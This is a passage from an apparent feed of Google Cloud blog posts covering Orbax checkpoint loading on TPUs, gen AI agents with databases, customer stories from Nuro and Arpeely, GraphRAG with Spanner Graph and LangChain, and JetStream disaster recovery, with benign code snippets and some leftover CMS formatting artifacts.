On a TPU cluster with 13 slices of v5e-256 machines, checkpoint loading completed compared to frequent timeouts with the standard approach. On a smaller scale, 5 slices of v5e-256, we observed over 2.6 times speedup. Results are shown in the table below.

Device Type	Number of VMs	Model Size	Speedup
TPU	5 x v5e-256 = 320	80B	2.6
TPU	13 x v5e-256 = 832	80B	Standard approach frequently failing
CPU	32 x 64 = 2048	78B	6.8

Memory-efficient broadcasting: Overcoming the memory bottleneck

Although this optimized checkpoint loading was effective, it required additional High Bandwidth Memory (HBM) for the broadcasting function. In some cases, this meant only a third of the available HBM could be used for the checkpoint data and that led to memory challenges working with large-scale checkpoint loading and emergency checkpointing.

To solve this, Orbax got a smart upgrade. Instead of broadcasting the entire checkpoint at once, it now breaks it into smaller, manageable chunks and broadcasts them sequentially. You can either tell Orbax how much memory it’s allowed to use for broadcasting, or it can estimate the HBM available for broadcasting based on the accelerator and model size.

This approach offers two important benefits:

Flexibility: Users can tailor broadcasting to their specific hardware and model sizes.
Minimized OOM errors: The solution respects user-defined memory limits, eliminating the risk of out-of-memory (OOM) errors during broadcasting.

The user can optionally specify a memory_limit parameter. If not provided, a utility function determines the device type and uses a predefined mapping to estimate the HBM associated with that device. The memory limit is then estimated as HBM - 2 * pytree_memory_per_device, incorporating a scaling factor to prevent OOM errors in edge cases.

This enhancement in Orbax ensures efficient memory utilization during checkpoint loading, particularly for large-scale models and in scenarios where memory constraints are critical. It empowers users to optimize the broadcasting process based on their specific hardware and model requirements, further enhancing the performance and reliability of Orbax’s checkpoint loading capabilities.

Let’s take an example

To illustrate how to use this optimized checkpoint loading feature, let’s refer to an example from MaxText. In this example, you enable the feature by setting enable_single_replica_ckpt_restoring=True.

Let’s break down this example in reverse order to understand the process. In Orbax, restoring a checkpoint involves providing restore_args to the checkpoint manager, e.g:

code_block: <ListValue: [StructValue([(‘code’, ‘restore_args = orbax.checkpoint.type_handlers.ArrayRestoreArgs(rn mesh=mesh, mesh_axes=pspec)rnrncheckpoint_manager.restore(rn latest_step,rn args=orbax.checkpoint.args.Composite(rn items=orbax.checkpoint.args.PyTreeRestore(item=abstract_unboxed_pre_state, restore_args=restore_args))rn )’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e84bc64c490>)])]>

Here, pspec tells Orbax how to arrange the pieces of your model across all the available devices in your setup (the global mesh). For example, given 5 slices of v5e-256 machines (that’s 1,280 TPU v5e chips in total), pspec may specify that the 80B parameter model is sharded on a single slice of v5e-256 and then replicated on each of the other slices. A simple example can be found here.

To restore using the optimized checkpoint loading method, we first need to register the SingleReplicaArrayHandler, optionally specifying the memory limit (in bytes) used for broadcasting:

code_block: <ListValue: [StructValue([(‘code’, ‘array_handler = orbax.checkpoint.type_handlers.SingleReplicaArrayHandler(rn broadcast_memory_limit_bytes=1024 * 1024 * 1000 # 1000 MB limitrn )rnorbax.checkpoint.type_handlers.register_type_handler(rn jax.Array,rn array_handler,rn override=True)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e849a6c70d0>)])]>

Next, we need to provide restore_args for each pytree element as follows:

code_block: <ListValue: [StructValue([(‘code’, ‘def get_restore_args(data):rn replica_axis_index = 0rn replica_devices = _replica_devices(mesh.devices, replica_axis_index)rn replica_mesh = jax.sharding.Mesh(replica_devices, mesh.axis_names)rn single_replica_sharding = jax.sharding.NamedSharding(replica_mesh, pspec)rnrn return orbax.checkpoint.type_handlers.SingleReplicaArrayRestoreArgs(rn sharding=jax.sharding.NamedSharding(mesh, pspec),rn single_replica_sharding=single_replica_sharding,rn global_shape=data.shape,rn dtype=data.dtype,rn )’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e849a6c7dc0>)])]>

Here, sharding specifies the sharding on the global mesh, while single_replica_sharding represents the sharding on a replica slice to which the current host belongs. These can be obtained using the following utility functions:

code_block: <ListValue: [StructValue([(‘code’, ‘def _find_idx(array: np.ndarray, replica_axis_idx: int):rn “””Returns the index along given dimension that the current host belongs to.”””rn idx = Nonern for idx, val in np.ndenumerate(array):rn if val.process_index == jax.process_index():rn breakrn return idx[replica_axis_idx]rnrnrndef _replica_devices(device_array: np.ndarray, replica_axis_idx: int):rn “””Returns the devices from the replica that the current host belongs to.rnrn Replicas are assumed to be restricted to the first axis.rnrn Args:rn device_array: devices of the mesh that can be obtained by mesh.devices()rn replica_axis_idx: axis dimension along which replica is takenrnrn Returns:rn devices inside the replica that current host is inrn “””rn idx = _find_idx(device_array, replica_axis_idx)rn replica_result = np.take(device_array, idx, axis=replica_axis_idx)rn return np.expand_dims(replica_result, axis=replica_axis_idx)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e849a6c7970>)])]>

Thus, setting enable_single_replica_ckpt_restoring=True triggers the creation and registration of a SingleReplicaArrayHandler which will be responsible for restoring the checkpoint. This example also demonstrated how to obtain the necessary single_replica_shardings for each host, a crucial requirement for this method.

Important note: Currently, the broadcasting functionality works only when replica_axis_index=0.

Get started

Unlock the full potential of ML models–learn more about Orbax and its features here. Compare checkpoint loading times with the new method to see if it helps. To get started:

Follow the instructions to install xpk and MaxText. XPK, the Accelerated Processing Kit helps developers orchestrate ML workloads with GKE accelerator clusters. MaxText offers highly scalable reference LLM implementations with JAX.
Train and save a checkpoint: Use your existing setup or adapt the example below.
Benchmark by comparing checkpoint loading times with and without enable_single_replica_ckpt_restoring=true.

Example command (adjust for your needs):

code_block: <ListValue: [StructValue([(‘code’, ‘xpk workload create \rn–cluster ${CLUSTER} \rn–zone ${ZONE} \rn–base-docker-image ${docker_image_name} \rn–tpu-type=v5litepod-256 \rn–num-slices=13 \rn–command “python3 MaxText/train.py \rnMaxText/configs/base.yml \rnbase_output_directory=${BASE_OUTPUT_DIR} \rndataset_path=${DATASET_PATH} \rnsteps=5 \rncheckpoint_period=2 \rnper_device_batch_size=1 \rnbase_num_query_heads=256 \rnbase_num_kv_heads=256 \rnbase_num_decoder_layers=160 \rnenable_single_replica_ckpt_restoring=true \rnrun_name=${RUN_NAME}” \rn–workload ${WORKLOAD_NAME}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e849a6c7fd0>)])]>

In this example, we adjust some parameters like `base_num_query_heads` to increase the model’s size. We set the number of training steps to 5 and the checkpointing frequency to every 2 steps so we can quickly observe the effects of our checkpointing changes. Note that you may need to run this command twice if no checkpoint has been saved yet. To explore the full range of configuration options, refer to the available configuration files or check out the code.

^{This work is a collaboration between multiple teams within Google. We especially want to thank Colin Gaffney, Rafi Witten, and Yash Katariya for their invaluable contributions. We also extend our sincere appreciation to Roshani Narasimhan, Matt Davidow, Vaibhav Singh, Niranjan Hira, Shivani Matta and Andi Gavrilescu for their guidance and support throughout this project.}

Read More for the details.

2025 03 24

GCP – Build gen AI agents using Google Cloud databases

Tibor Kiss Cloud, Google Cloud gcp

As enterprises build generative AI agents to strengthen their security posture or improve their customer experience, they need access to real-time data. Because most business critical and real-time data is stored and processed in databases, you need ways to perform agentic orchestration in dynamic ways.

In this post, we’ll define a new tech stack composed of models, tools, data stores, and applications. We’ll show why each component is important to serving the needs of enterprise customers based on scale, performance, security, and manageability. Let’s dive in.

1. From LLMs to RAG Agents — From LLMs to RAG Agents

Components of an agentic application

In the world of services, human agents have been supporting customers for decades. They’ve helped with travel reservations, insurance recommendations, and contract negotiations. “AI” agents are similar in the way they support users, but they have additional advantages. We’re seeing organizations build increasingly sophisticated AI agents to:

Deliver hyper-personalized experiences by understanding their needs based on history
Help employees be more productive and work better together with automated tools
Assist the creative process by generating content and running campaigns based on objectives
Perform complex data analysis with multiple data sources to act on signals and patterns
Accelerate software development with AI-enabled code generation and assistance
Strengthen security posture by mitigating attacks and increasing the speed of investigation

Agentic apps have a few additional features when compared to previous gen AI apps—they have a more sophisticated orchestration module with additional instructions which enables them to reason and plan by utilizing various tools.

2. Agentic app architecture — Agentic app architecture

The orchestration system within the agent runtime works with foundation models and tools to call service APIs, connect to databases, and even collaborate with other agents. There are a few core modules that construct an agent runtime.

Orchestration: Maintains the memory and state of sessions, sends prompts to the model and parses the response. If the response includes tool calls then the orchestration performs the corresponding API call and includes the results in the next prompt.
Models: Used to reason over goals to determine the next steps and generate a response.
Data: Retrieves application data from other service APIs, operational data from databases, analytical data from lake houses, and unstructured data from blobs.

Developers can configure the agent with natural language instructions and examples to guide them. Then they can give access to various types of memory such as session histories, user profiles, and task profiles, and can augment it with task decomposition and planner services to break down complex requests into smaller work streams.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e849a716550>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>

Connecting agents to Google Cloud Databases

Agents are only as powerful as the tools that they can use to perform their tasks. And most enterprise applications rarely use just a single data source. That is one reason why agentic orchestration has emerged as a new paradigm for LLM-powered applications to handle more complex tasks. Agents can select from a set of functions called “tools” which can access data or take actions which inform the next step. Using this dynamic, iterative process, agents can automate complex enterprise workflows.

However, there are several challenges developers face when creating and managing tools at scale. Agents often use multiple tools and frameworks as well as connect to various data sources which can be difficult to integrate. One of the most challenging tasks for agents is the discovery and connectivity to data sources. This process can be complex and introduce security challenges, while supporting multiple frameworks can be difficult to manage.

That’s where Gen AI Toolbox for Databases comes in, an open-source service that empowers application developers to connect production-grade, agent-based AI applications to databases. It streamlines the creation, deployment, and management of sophisticated gen AI tools capable of querying databases with secure access, robust observability, scalability, and comprehensive manageability. Gen AI Toolbox currently provides connectivity to popular open-source databases such as PostgreSQL, MySQL, Neo4j, Hypermode, as well as Google Cloud databases such as AlloyDB (+Omni), Spanner, and Cloud SQL.

3. Gen AI Toolbox for Databases — Gen AI Toolbox for Databases

Gen AI Toolbox for Databases improves how gen AI tools interact with data, addressing common challenges in gen AI tool management. By acting as an intermediary between the application’s orchestration layer and data sources, it enables faster development and more secure data access, improving the production-quality of tools.

Using natural language to query databases with agents

Once your agents are connected to databases you can use a wide variety of methods to query the data. A recent technique that is gaining popularity is using natural language to query databases. Through the power of LLMs, your natural language questions such as:

“What are the cheapest direct flights from Boston to Denver in July?”

Can be converted to a SQL query like:

SELECT flight.id, flight.price, carrier.name, […]

FROM […]

WHERE […]

ORDER BY flight.price ASC

AlloyDB provides the capability to convert natural language questions like these into SQL statements. This enables gen AI applications to more securely execute natural-language queries such as “Where is my package?” or “Who is the top earner in each department?” AlloyDB does this by translating the natural-language input into a SQL query specific to your database and filtering the results only to what the user of your application is allowed to view.

Since natural language is already used for LLM prompts, it would be efficient and easier for agents and gen AI apps to pass the queries to the database without having to convert them to SQL statements, if the database can understand natural language—opening up a new approach for data access and retrieval.

Handling complex data models for agents

For large organizations, it is common to have various data types and models. Furthermore, interconnected data is becoming increasingly important to customers for use cases such as knowledge graphs, recommendations, and fraud detection. This has been a challenging problem to solve for agents as it requires them to discover and traverse various data systems and combine the results afterwards.

4. Graph-based models for connected data — Graph-based models for connected data

With Graph built into Spanner this can be resolved with a simple call for an agent. Spanner is a multi-model database that supports differentiated graph, vector, and full-text search. Graph search will get the relevant results based on the pre-defined relationships, vector search can retrieve the categorical results for similarity searches, and full-text search can get the exact matches—together enabling hybrid search from a single database.

This provides a powerful way to provide enterprise context for agents across a wide variety of data models without having to combine the results separately.

Get started with agentic apps and databases

To get started building agentic apps with Google Databases, download and try Gen AI Toolbox for Databases on Github.

Read More for the details.

2025 03 24

GCP – Nuro drives autonomous innovation with AlloyDB for PostgreSQL

Tibor Kiss Cloud, Google Cloud gcp

Editor’s note: Nuro, a robotics company that develops technology for self-driving vehicles, needed a data platform that could handle complex data processes and support continuous AI model improvement. By migrating to AlloyDB for PostgreSQL, Nuro gained the scalability, high performance, and advanced query capabilities needed to power AI-driven insights across millions of data points while reducing operating costs. AlloyDB AI further enables Nuro to perform complex similarity searches on vector embeddings, supporting continuous improvement.

Nuro’s mission is to make daily life better through robotics.

One of the ways we achieve this is with Nuro Driver, an AI-powered technology that automakers and mobility providers use to develop autonomous vehicles for personal use, delivery services, and ride-sharing applications.

Naturally, creating self-driving technology that’s truly safe and reliable takes more than just innovation — it requires a platform capable of processing vast amounts of data and adapting to continuous learning cycles. That’s why we needed data infrastructure that could handle our growing volumes of complex data and support essential processes like data discovery, labeling, and rapid evaluation.

As we navigated options for a managed SQL database that could handle these challenges and build on our existing PostgreSQL setup, we explored several options. We ultimately arrived at AlloyDB, a high-performance, fully managed PostgreSQL-compatible database on Google Cloud, for its superior performance, ease of use, and seamless integration.

Gearing up for autonomous data growth

Transitioning to a new data infrastructure can often be disruptive, but with AlloyDB, the process was seamless. The migration from our existing PostgreSQL environment required zero downtime and one-click setup. This allowed for continuous fleet operations without interruptions to deliveries or model training. AlloyDB now powers our core transactional and analytical workloads, managing crucial metadata for logs, trips, simulations, and real-time autonomy issues.

Operating across multiple cities, we rely on Google Cloud’s global availability to collect and manage petabytes of data for AI model training, evaluation, and simulation — with quick turn-around. This infrastructure enables analysis for refining route optimization to find challenging scenarios so our AI models can learn based on real-world on-road performance. AlloyDB plays a critical role in this ecosystem, efficiently processing large query volumes while supporting the rapid, data-driven decisions essential to autonomous operations.

Beyond performance, AlloyDB’s fully managed service reduced the burden of scaling and maintenance, allowing our team to focus on improving AI models rather than database administration. Its advanced query capabilities and deep integration with Google Cloud streamlined workflows, helping us iterate on autonomy models faster. With improved efficiency and reliability, our fleet can continuously evolve.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e849a324c10>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>

A data platform built for the long road ahead

Google Cloud is always innovating new ways to advance autonomous driving. We recently migrated all our vector embeddings to AlloyDB AI, enabling ML-based similarity searches across millions—and sometimes hundreds of millions—of vectors. With AlloyDB’s vector store and advanced indexing using ScaNN, our autonomy team can run complex similarity searches that quickly identify scenarios where Nuro Driver can learn and improve. AlloyDB’s high query performance for both transactional and analytical tasks ensures we can scale our dataset continuously, allowing us to train models on increasingly complex road conditions without performance bottlenecks.

To support these capabilities and improve performance, we’ve built a comprehensive ecosystem on Google Cloud. Cloud Storage serves as our primary storage for autonomy logs, on-road operation data, simulation records, and ML evaluation files. Using change data capture from Datastream, we replicate AlloyDB data to BigQuery in near real-time. This creates a unified flow that supports business dashboards and provides detailed, real-time analytics on autonomy performance. BigQuery serves as the main backend for analytical metrics, enabling precise evaluation and validation of the Nuro Driver.

Additionally, we use Spanner for storing log namespace metadata, while Firestore, Datastream, and Memorystore support various other applications, making our data management flexible and efficient. This diverse set of databases on a single cloud platform not only centralizes data management but also enables real-time insights and seamless data access. It’s the robust, scalable foundation we need to drive reliable autonomy at scale.

AlloyDB takes the driver’s seat in Nuro’s data transformation

Since migrating to AlloyDB AI, we’ve seen a substantial reduction in the operational costs of storing and searching embeddings. AlloyDB AI’s horizontal scalability has proven to be the most cost-effective solution for our needs, allowing us to add several new types of embeddings across applications without concerns over performance. With ScaNN indexing, our searches now yield over 20,000 high-precision results in seconds, outperforming alternative indexing methods like IVF and HNSW in both quality and scalability.

Our partnership with Google Cloud has also been invaluable. We have continuous access to innovations from the Google Cloud team, and we can easily meet any database requirement by leveraging their extensive suite of products. This support has accelerated our development, enabling us to focus on what matters most — advancing autonomous technology.

Looking forward, Google Cloud remains our primary cloud platform. Relying on its global presence and infrastructure, we can expand our services to new customers worldwide, all while maintaining the high standards of reliability and performance our team depends on. Google Cloud gives us the green light to tackle future challenges in autonomous driving, remove potential roadblocks, and keep innovation on the fast track.

Ready to get started with AlloyDB in your own environment? Check out the following resources:

Discover how AlloyDB combines the best of PostgreSQL with the power of Google Cloud in our latest e-book.
Try AlloyDB at no cost for 30 days with AlloyDB free trial clusters!
Learn more about AlloyDB for PostgreSQL.

Read More for the details.

2025 03 21

GCP – The AI lens: How Arpeely uses multimodality and BigQuery to revolutionize AdTech

Tibor Kiss Cloud, Google Cloud gcp

Traditional programmatic advertising often misses the mark. Flat pricing, limited targeting, and a focus on immediate conversions over long-term customer value leave advertisers wanting more. At Arpeely, we’re changing the game in three ways by:

Putting our own money on the line for performance with a different business model.
Taking care of creatives and the funnel end-to-end.
Optimizing on lifetime value.

Arpeely is on a mission to transform the way advertisers connect with their audiences online, fueled by one simple belief: To truly understand the internet, you need to see it. Not just the text and code — but the images, the emotions, the nuances that make each web page unique. That’s why we’re doubling-down on our ad-tech platform on Google Cloud.

In this post, we’ll take a closer look at how Google Cloud is helping us to leverage the power of multimodality and AI in products like BigQuery and Gemini to make media buying smarter, more efficient, and laser-focused on long-term value.

Transforming how Arpeely ‘sees’ the internet with multimodal AI

Our AI algorithms analyze massive datasets to identify the users most likely to become loyal, high-value customers for our clients, but we need to understand the web on a deeper level to do that effectively. That’s where multimodality — the ability to process multiple types of data — comes in. We don’t just look at text; we use Google Cloud’s powerful multimodal AI, including Gemini Pro Vision and Gemini Flash 1.5 to analyze web page screenshots, extracting visual information that enriches our understanding in real time. This allows us to cluster billions of websites with remarkable speed and precision, uncovering connections and insights that traditional methods would miss.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3e89d94d9be0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>

Taming the data deluge with BigQuery and Pub/Sub

Building an AI-powered, multimodal ad platform requires handling a truly staggering amount of data. With BigQuery, we can constantly crunch numbers, analyze user behavior, and generate insights from over 25 petabytes of compressed data, fueling our real-time bidding engine.

But AI demands speed as well as scale. That’s why we rely on Pub/Sub, Google Cloud’s real-time messaging service, to keep the information flowing. Pub/Sub acts like our central nervous system, connecting our microservices and ensuring that our AI algorithms have the up-to-the-second data they need to make smart decisions.

Going beyond keywords: BigQuery vector search for unprecedented ad relevance

Traditional ad targeting relies on keywords, which are blunt instruments in the nuanced world of online behavior. Apeely takes a smarter approach by using the ML.GENERATE_EMBEDDING function within BigQuery ML to generate embeddings for the webpage in real time. By representing web pages and ad creatives as vectors in a multi-dimensional space and using BigQuery vector search, we can understand the semantic relationships between them in real time. This means we can deliver highly contextual ads that go beyond simple keyword matching, resulting in greater relevance, higher click-through rates, and better campaign performance for our clients, with a 15% uplift in revenue.

Making ads blend in and stand out with Visual Question Answering

Our commitment to understanding the visual web goes even further with Visual Question Answering (VQA). By training AI models to “see” and interpret images, we can extract detailed information about web pages, such as dominant colors, layouts, and even emotional tones. Our VQA models enable us to dynamically adjust the look and feel of our ads to match the context of each page, creating a more seamless and engaging experience for users, resulting in a 28% increase in user engagement.

The Google Cloud advantage: Building the Future of AdTech

Building Arpeely on Google Cloud has been instrumental in bringing our AI-powered vision to life. The platform’s scalability, serverless offerings, and unified ecosystem give us the agility and efficiency we need to innovate at a rapid pace.

We’re incredibly excited about the future of ad-tech and the role AI will continue to play. With Google Cloud as our trusted partner, we’re confident in our ability to lead the way toward a more intelligent, effective, and value-driven advertising landscape.

Get started with multimodality use cases in BigQuery today.

Read More for the details.

2025 03 21

GCP – Build GraphRAG applications using Spanner Graph and LangChain

Tibor Kiss Cloud, Google Cloud gcp

Spanner Graph redefines graph data management by integrating graph, relational, search, and AI capabilities with virtually unlimited scalability. GraphRAG has emerged as a frontrunner in building question-answering systems that enable organizations to extract relevant insights from their interconnected data. In this blog, we demonstrate how to leverage LanghChain and Spanner Graph to build powerful GraphRAG applications.

Application developers are increasingly experimenting with Retrieval Augmented Generation (RAG), which enhances the performance of generative AI (gen AI) foundation models by enabling dynamic knowledge retrieval. Rather than relying solely on pre-trained knowledge, RAG systems query external data sources during inference, commonly using techniques like vector search. The retrieved information is then integrated into the prompt, leading to more accurate and contextually relevant responses.

Vector-based RAG is effective at retrieving relevant content, however, it can sometimes overlook the interconnectedness of data, failing to capture relationships like citations or product dependencies. GraphRAG addresses this gap and is increasingly gaining popularity. It creates a knowledge graph from varied data sources, allowing for context retrieval through a blend of graph queries, and vector search, thereby producing more detailed and contextually relevant responses for gen AI applications.

LangChain is a leading orchestration framework for building RAG applications that simplifies the integration of diverse data sources and foundation models. Recently, we integrated Spanner Graph and LangChain, streamlining the development of GraphRAG solutions. By making Spanner Graph’s enterprise-grade, scalable, and reliable graph capabilities available directly in LangChain workflows, we’ve made it easier for developers to build advanced, relationship-aware RAG systems.

Let’s jump in.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e89d71d4ac0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>

Building a retail application using GraphRAG

To illustrate the practical application of GraphRAG, let’s consider an electronics e-commerce scenario. Imagine an online retailer with a vast collection of data, including product specifications, bundle offerings, and promotional deals. This data contains implicit relationships between various entities:

Products: A laptop, for example, might have compatible accessories or be part of a bundle.
Categories: Products belong to categories, which can have hierarchical relationships (e.g., “Laptops” is a subcategory of “Computers”).
Customers: Customers have purchase histories and preferences, indicating relationships with products and categories.

While traditional vector-based RAG can retrieve basic product information in response to a customer query, GraphRAG provides a more comprehensive and contextualized understanding. By representing these entities and their relationships as a graph, the system can traverse connections and provide richer, more relevant information.

Let’s take a look at the steps involved to use GraphRAG using Spanner Graph and LangChain.

Step 1: Construct the knowledge graph
To leverage the power of GraphRAG, the first step is to transform your data corpus into a knowledge graph. This transformation can be achieved through various methods, including Spanner Graph schema, custom code or existing libraries. In this example, we’ll demonstrate using LangChain’s LLMGraphTransformer to convert a subset of our retail business’s unstructured document corpus into a graph.

The LLMGraphTransformer accepts the node and relationship types, along with their properties, as input which specifies the following:

Node types: the types of entities in the graph (e.g., “Product,” “Bundle,” “Deal”).
Relationship types: the types of connections between entities (e.g., “In_Bundle,” “Is_Accessory_Of,” “Is_Upgrade_Of,” “Has_Deal”).
Properties: the attributes associated with nodes and edges (e.g., “name,” “price,” “weight,” “deal_end_date,” “features”).

Given this input, the LLMGraphTransformer processes the documents and generates a graph represented as a list of GraphDocument objects.

Here’s a code snippet illustrating this process:

code_block: <ListValue: [StructValue([(‘code’, ‘# load documentsrnloader = DirectoryLoader(‘…’)rndocuments = loader.load()rnrn# convert documents to graphrnllm_transformer = LLMGraphTransformer(rn llm=ChatVertexAI(),rn allowed_nodes = [“Product”, “Bundle”, “Deal”, “Category”, “Segment”, ],rn allowed_relationships = [“In_Category”,”In_Bundle”, “Is_Accessory_Of”,rn “Is_Upgrade_Of”, “Has_Deal”],rn node_properties=[ “name”, “price”, “weight”, “deal_end_date”, “features”, ],rn)rngraph_documents = llm_transformer.convert_to_graph_documents(documents)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d71d4520>)])]>

To use semantic search in our GraphRAG application, we also need to generate vector embeddings for our graph nodes. This enables us to identify nodes based on the semantic meaning of their content. In our retail scenario, we can generate embeddings for the textual descriptions of features of products, categories, and other relevant entities.

Here’s a simplified example of how we can generate these embeddings:

code_block: <ListValue: [StructValue([(‘code’, ’embedding_service = VertexAIEmbeddings()rnfor graph_document in graph_documents:rn for node in graph_document.nodes:rn if “features” in node.properties:rn node.properties[“embedding”] =rn embedding_service.embed_query(node.properties[“features”])’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d71d4070>)])]>

Alternatively, you can follow this Get Vertex AI text embeddings guide to use Spanner’s built-in text embedding generation capabilities.

Step 2: Store the knowledge graph in Spanner Graph
To persist and query the constructed knowledge graph, you can utilize the SpannerGraphStore library to load the generated graph into Spanner Graph. This library simplifies the process by handling the underlying Spanner Graph schema generation, including the necessary input tables and the graph itself, and then applying that schema to the database. Additionally, it performs lightweight reconciliation of duplicate nodes and edges within the graph before writing the data to the database, improving data integrity.

Here’s an example of how you can store a graph:

code_block: <ListValue: [StructValue([(‘code’, ‘from langchain_google_spanner import SpannerGraphStorernrn# Initialize SpannerGraphStorerngraph_store = SpannerGraphStore(rn instance_id=INSTANCE,rn database_id=DATABASE,rn graph_name=GRAPH_NAME,rn)rnrn# store documents into Spanner Graphrngraph_store.add_graph_documents(graph_documents)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d71d4df0>)])]>

Step 3: Inspect the knowledge graph
Once the knowledge graph is loaded into Spanner Graph, you can use Spanner Graph Notebook to inspect both its schema and the data itself to ensure it accurately represents the retail information. You can use the following magic command to connect to the Spanner Graph instance and explore the graph:

code_block: <ListValue: [StructValue([(‘code’, ‘%%spanner_graph –project PROJECT –instance INSTANCE –database DATABASErnrnGRAPH retail_graphrnMATCH p = ()->()rnRETURN TO_JSON(p) AS path_jsonrnLIMIT 200;’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d71d4610>)])]>

You can then inspect the graph schema and interact with the graph data as illustrated below:

Step 4: Retrieve context using the SpannerGraphVectorContextRetriever
This section demonstrates how GraphRAG excels at context retrieval for generating answers compared to conventional RAG. To answer questions grounded in the generated graph, you can utilize the SpannerGraphVectorContextRetriever. This retriever takes a natural language question as input and leverages vector search to identify nodes in the graph that are the closest semantic matches. It then enhances the context by exploring paths from the matched nodes up to a defined number of hops. The retriever effectively combines the power of vector search with the capabilities of graph traversals within Spanner Graph.

Let’s analyze how the retriever handles the following natural language question: "I am looking for a beginner drone. Please give me some recommendations".

First, you construct a SpannerGraphVectorContextRetriever configured to answer product-related questions. Then, you invoke the retriever with the natural language question to obtain the relevant context:

code_block: <ListValue: [StructValue([(‘code’, ‘retriever = SpannerGraphVectorContextRetriever.from_params(rn graph_store,rn VertexTextEmbedding(),rn label_expr=”Product”,rn expand_by_hops=1, #expands to all nodes one hop awayrn)rnquestion = “I am looking for a beginner drone. Please give me some recommendations.”rncontext = retriever.invoke(question)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d71d47f0>)])]>

The retriever leverages Spanner vector search to identify the most relevant product — in this case, the SkyHawk Zephyr Drone (specified as a beginner drone in the input documents). It then navigates the graph to discover related information, including bundles, compatible accessories, potential upgrades, and available deals for the SkyHawk Zephyr Drone. The neighborhood subgraph retrieved by the SpannerGraphVectorContextRetriever, centered on the “SkyHawk Zephyr Drone” node, is illustrated below:

This enriched context is then passed to the LLM, which produces the final answer to the question.

How GraphRAG outperforms conventional RAG

To illustrate how GraphRAG provides a richer, more informative answer compared to conventional RAG using vector search alone, we compare their results below:

Conventional RAG

GraphRAG

Based on the information provided, I recommend the SkyHawk Zephyr Drone or the SkyHawk Zephyr Starter Package for a beginner drone. Both are priced at $129.99 and are designed with simplicity and stability in mind, offering user-friendly controls, automatic takeoff and landing, and a durable design. The Starter Package includes everything you need to begin flying.

The SkyHawk Zephyr Drone is a good option for a beginner drone, it has features like User-Friendly Controls, Stable Flight, Durable Design, HD Camera, Long Flight Time, and One-Key Return. It is priced at $129.99.

It also has a limited time deal price of $109.99. There are also some bundles and accessories available for this drone. The SkyHawk Zephyr Explorer Package is priced at $179.99 and the Skyhawk Zephyr Starter Package is priced at $129.99. The SkyHawk Zephyr Extended Battery is an accessory that increases flight time and is priced at $29.99. The Skyhawk Zephyr Propeller Guards are also available for $14.99. If you are looking for an upgrade, the Skyhawk Zephyr 2.0 is available for $199.99.

Notably, both RAG workflows identify the SkyHawk Zephyr Drone as the beginner drone and recommend the SkyHawk Zephyr Starter Package. However, GraphRAG also surfaces valuable additional information about the recommended products, including:

Accessories available for the SkyHawk Zephyr Drone
Related deals on the recommended product
The option to upgrade to the next tier of the recommended drone, specifically the SkyHawk Zephyr 2.0

Get started today

Google Spanner Graph and LangChain streamline GraphRAG development by combining Spanner Graph’s enterprise-grade reliability, scalability, and distributed graph processing with LangChain’s versatile tools. This enables rapid prototyping of intelligent applications and unlocks valuable data insights. We’re excited to see what you’ll build!

To get started, visit the GitHub repository. You can deep dive into the reference notebook tutorial for the use case discussed above. Learn more about Spanner Graph benefits and use cases here. Use this quick setup guide to get started with Spanner Graph capabilities.

Read More for the details.

2025 03 21

GCP – JetStream for GCE Disaster Recovery Orchestration: Protect and manage your critical workloads

Tibor Kiss Cloud, Google Cloud gcp

Enterprises need strong disaster recovery (DR) processes in place to ensure business continuity in the face of unforeseen disruptions. A robust disaster recovery plan safeguards essential data and systems, minimizing downtime and potential financial losses. This not only helps maintain customer trust by providing service reliability but also can help play a vital role in meeting regulatory compliance requirements.

An effective DR solution provides near-zero recovery-point and recovery-time objectives (RPO and RTO). JetStream Software is partnering with Google Cloud on its orchestrated JetStream for Google Compute Engine Disaster Recovery Orchestration, which you can deploy and use via Google Cloud Marketplace.

The solution uses Google Cloud’s Asynchronous Replication, which simplifies block-level storage replication with API-driven, agentless functionality, without performance overhead. Asynchronous replication protects data between two regions with low RPO and low RTO. In the unlikely event of a regional outage, Async Replication lets you failover your data to a secondary region and restart your workload in that region. It also supports consistency groups for multi-disk applications. Compute Engine supports block-storage asynchronous replication with RPO < 1 minute, cloning for DR testing, rapid replication disconnect and storage attach to support rapid recovery, and compatibility with high performance disks.

And for organizations that need near-zero RTO, minimal downtime automated recovery processes, non-disruptive failover testing, and robust protection orchestration, JetStream for GCE Disaster Recovery Orchestration provides:

Configuration management: Manages runtime configuration changes for your VMs
Tight integration: Available directly through GCP Marketplace
Ready-to-use failover and failback orchestration: Enables rapid recovery and business continuity and full orchestration of protection, failover, run DR drills for failover and failback operations, minimizing downtime and impact on the business
Continuous monitoring: Provides replication monitoring to help ensure data protection
Continuous replication: Helps ensure minimal data loss in a disaster scenario

Let’s take a deeper look at some of these capabilities.

Setup and configuration management
